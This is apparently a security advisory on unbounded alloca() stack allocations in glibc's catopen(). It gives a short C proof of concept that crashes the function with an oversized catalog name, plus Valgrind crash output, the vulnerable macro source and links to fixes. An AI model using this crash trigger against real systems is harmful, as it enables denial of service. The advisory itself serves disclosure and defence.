glibc catopen() Multiple unbounded stack allocations
URL: https://cxsecurity.com/issue/WLB-2016010149
---------------------------------------
PoC:
#include <nl_types.h>
#include <string.h>
#include <stdlib.h>
int main(){
char *buff;
buff=malloc(11111111);
memset(buff,'A',11111110);
buff[11111110]='\0';
catopen(buff, NL_CAT_LOCALE);
return 0;
}
---------------------------------------
========================
==25788== Memcheck, a memory error detector
==25788== Copyright (C) 2002-2013, and GNU GPL'd, by Julian Seward et al.
==25788== Using Valgrind-3.10.0.SVN and LibVEX; rerun with -h for copyright info
==25788== Command: ./cato
==25788==
==25788== Warning: client switching stacks? SP change: 0xfff000330 --> 0xffe567648
==25788== to suppress, use: --max-stackframe=11111656 or greater
==25788== Invalid write of size 8
==25788== at 0x4E6CD5A: __open_catalog (open_catalog.c:102)
==25788== by 0x4E6C38E: catopen (catgets.c:71)
==25788== by 0x400616: main (in /home/kalibaba/cato)
==25788== Address 0xffe567648 is on thread 1's stack
==25788==
==25788==
==25788== Process terminating with default action of signal 11 (SIGSEGV)
==25788== Access not within mapped region at address 0xFFE567648
==25788== at 0x4E6CD5A: __open_catalog (open_catalog.c:102)
==25788== If you believe this happened as a result of a stack
==25788== overflow in your program's main thread (unlikely but
==25788== possible), you can try to increase the size of the
==25788== main thread stack using the --main-stacksize= flag.
==25788== The main thread stack size used in this run was 8388608.
========================
open_catalog.c
#define ENOUGH(n)
if (__builtin_expect (bufact + (n) >= bufmax, 0))
{
char *old_buf = buf;
bufmax += 256 + (n);
buf = (char *) alloca (bufmax); <===============
memcpy (buf, old_buf, bufact);
}
and others alloca() in catopen()
--- Links ---
https://sourceware.org/bugzilla/show_bug.cgi?id=17905
https://sourceware.org/git/gitweb.cgi?p=glibc.git;h=7565d2a862683a3c26ffb1f32351b8c5ab9f7b31
https://sourceware.org/git/gitweb.cgi?p=glibc.git;h=0f58539030e436449f79189b6edab17d7479796e
https://www.securecoding.cert.org/confluence/display/seccode/MEM05-C.+Avoid+large+stack+allocations
--- Credit ---
Maksymilian Arciemowicz from CXSECURITY
https://cxsecurity.com
http://cifrex.org